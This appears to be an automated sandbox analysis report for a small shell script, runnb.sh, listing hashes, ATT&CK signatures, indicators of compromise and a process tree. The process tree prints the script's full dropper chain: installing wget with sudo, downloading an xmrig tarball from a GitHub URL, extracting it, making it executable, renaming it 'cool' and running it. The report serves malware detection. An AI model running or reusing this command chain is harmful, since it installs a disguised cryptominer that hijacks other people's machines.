Analysis
-
max time kernel
60s -
max time network
63s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
30-10-2024 07:15
Static task
static1
Behavioral task
behavioral1
Sample
runnb.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral2
Sample
runnb.sh
Resource
debian12-armhf-20240221-en
Behavioral task
behavioral3
Sample
runnb.sh
Resource
debian12-mipsel-20240221-en
Behavioral task
behavioral4
Sample
runnb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral5
Sample
runnb.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral6
Sample
runnb.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral7
Sample
runnb.sh
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral8
Sample
runnb.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral9
Sample
runnb.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
runnb.sh
-
Size
213B
-
MD5
a1189543e2f98f6696c6d857b899ab0a
-
SHA1
30b167128357a05cb5ae4d8bd386d63839d99c4d
-
SHA256
a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
-
SHA512
472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 771 chmod -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Reads CPU attributes 1 TTPs 2 IoCs
Processes:
exim4exim4description ioc process File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online exim4 -
Processes:
tarsudodpkgaptmvsendmailsendmailaptdpkgdpkgdpkgdescription ioc process File opened for reading /proc/filesystems tar File opened for reading /proc/sys/kernel/ngroups_max sudo File opened for reading /proc/self/stat sudo File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems sudo File opened for reading /proc/self/fd apt File opened for reading /proc/filesystems mv File opened for reading /proc/self/fd sudo File opened for reading /proc/sys/kernel/ngroups_max sendmail File opened for reading /proc/sys/kernel/ngroups_max sendmail File opened for reading /proc/self/fd apt File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
Processes:
aptaptdescription ioc process File opened for modification /tmp/fileutl.message.oJsfFK apt File opened for modification /tmp/fileutl.message.6V24ff apt File opened for modification /tmp/fileutl.message.I3haiP apt File opened for modification /tmp/fileutl.message.gXQoLN apt File opened for modification /tmp/fileutl.message.loMvz3 apt File opened for modification /tmp/fileutl.message.ouhuJA apt File opened for modification /tmp/fileutl.message.pToxuj apt File opened for modification /tmp/fileutl.message.uSU5ko apt
Processes
-
/tmp/runnb.sh/tmp/runnb.sh1⤵PID:706
-
/usr/bin/sudosudo apt install wget2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:709 -
/usr/sbin/sendmailsendmail -t3⤵
- Reads runtime system information
PID:724 -
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1t620l-0000Bg-LF4⤵
- Reads CPU attributes
PID:737 -
/usr/sbin/sendmailsendmail -t3⤵
- Reads runtime system information
PID:728 -
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1t620l-0000Bk-KJ4⤵
- Reads CPU attributes
PID:738 -
/usr/bin/aptapt install wget3⤵
- Reads runtime system information
- Writes file to tmp directory
PID:731 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:734 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:744 -
/usr/bin/aptapt install wget2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:766 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:767 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:768 -
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz2⤵PID:769
-
/bin/tartar xvf xmrigtar.tar.gz2⤵
- Reads runtime system information
PID:770 -
/bin/chmodchmod +x xmrig2⤵
- File and Directory Permissions Modification
PID:771 -
/bin/mvmv xmrig cool2⤵
- Reads runtime system information
PID:772 -
/tmp/cool./cool2⤵PID:773
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
847B
MD5bf4182d86e020bf938bd32ec985c62dd
SHA12476fcac37a7440d121c18d63048c4ed00b58446
SHA256a9efd7602b386ebe2c7b53cd580a5820834ab3da2dfe49c810efd779c27d1589
SHA5120974af6aa78e89a38ebc8e1bbb25ab19f510a9f88c10894f78814e8ffc37f80a857ecdd34e1ec7172ca62ced8a880399078f5bb769d5fdba3aee1db2fd65864d
-
Filesize
1KB
MD58f5a6d7682697cc73d93d9c28a1b33f8
SHA15ba114473db4d4da28e96d97bb0abdbf97ee32d6
SHA256eafdbe7aadd911911836aec45a34dfd9e4b7081d7ce2cc774666a158ef7cd537
SHA512c4252f40dfc3b9fc07aec5864911f66753ffa0fd17c8da15b0a9991a92d09260c9a88f072bd77d4d3d84d7215a58c980cc80f98c6089589dc2ff120d639cd439
-
Filesize
130B
MD5f0961e544ff64875dc309b83b8750a84
SHA1c07ab3e0c294d43b26776aa0fb14a4837e177019
SHA256a51b5df027e0139fd408d454f1182eb744c69da3d04f1362dd404ee4489e86f9
SHA5122c22927d980d9fd1c4d0f36b0fd16281c339b945fa2fd96532001dce44bd7bdd498a1ef7d9c9551eb8302edf375c3d24f6ed0d1bfee60f43023548e12485514e
-
Filesize
147B
MD5f2afad7ad86cac0f095d71fd5c03f9d8
SHA1ed1d46b461fed8dbc55f3dc81fb022effb36658b
SHA256f4a78fb61899ffd8593d915d9ae812940fd3d1d3edbb24acb832cc876f3fe562
SHA5124e9bf1a8c8adbe1734df787e31525e6cc1bbcf54203c67d841031f57a73c8d0d4d00d797364caf2e4bff5b51344b1f000f44c32d3286b225ba265769ae058db3
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
918B
MD55c965c9eb35d9a5fdc498619f0b0dee6
SHA18f7a34cfe6ed6ca68f0e1682a16881b5c6548fdc
SHA25627670f673368e8460599e6ae2b6363791b448525db33f32d24e4307cd59e5912
SHA5128e47303ee783539d6f0b9838b5dea5c948da8b4f013eb73e79b54bf45e55e0bbc9ecb2170b2241a48f79e04f30f5c39cdf513da3e354a6b56f3065324e4b32a4
-
Filesize
288B
MD5b8471cfaa0857928b385730343ee067c
SHA1511f4d9965acc6fa9181d66e844de59d81179646
SHA256c43e3cbf1272f39cdb0ed128fa501bbaee50fde3d71e9bf1a02db48c643758cc
SHA5127e66234ded36378990d5441f9a2f1b508e7d0a999f343aff470ebae9f1f72537decde7cdb3839ddcdb8d893fa961fd3c1649733352cf73ecd4966aaa9670ffa7
-
Filesize
89B
MD526c5c903cfa4320d6ee19c3adafed2f4
SHA12c4ad0787d98d145e030d4fe2bbfad9c0712e7e6
SHA256b03eaf1505db3112db904cc17dc304590472ae8a8dcc105e88f31fcf467814e3
SHA51239d46ef92469e23644de7f45476de75e52643ace868c9c2104bd68a4cecacf7c41580dd86ced40e70bd35ac9b4dd2642259e6c3d558a6cee7d16f293dfeabcb1
-
Filesize
288B
MD53f6b18dc8375e30629cb251a1e2d9049
SHA1c28cf044b4f8b9aebd63fff0202fe9f5fe123315
SHA25622a42466c73b2a70c0fac99dc7375c844dd40e0cb5b44e66a68b0c62f9940f29
SHA512182ade507f5d94c41e1944ac56b7d0d85585130839ab5f8af88862459b133f44d3b4379b0c10e6eeddee608c651ca2d85cbd2436aa63a15263b22478d4b9707e
-
Filesize
89B
MD517984f98ac58818cb31fb3ed3b4fad55
SHA1035b237c8b447db2d893ef854d791826c2dd3096
SHA25664b10a644daa6dd96b5af81b3fc1e8700df2d90dda3349268ad82394ee61ac47
SHA5123d99c106ee19d75a329d0a414992af848819b82f2e473bea15bcaa188d0dd7f55b53c64b3e8d773932fe87fa0b0d85b456130248f87c7b70294ddda835364658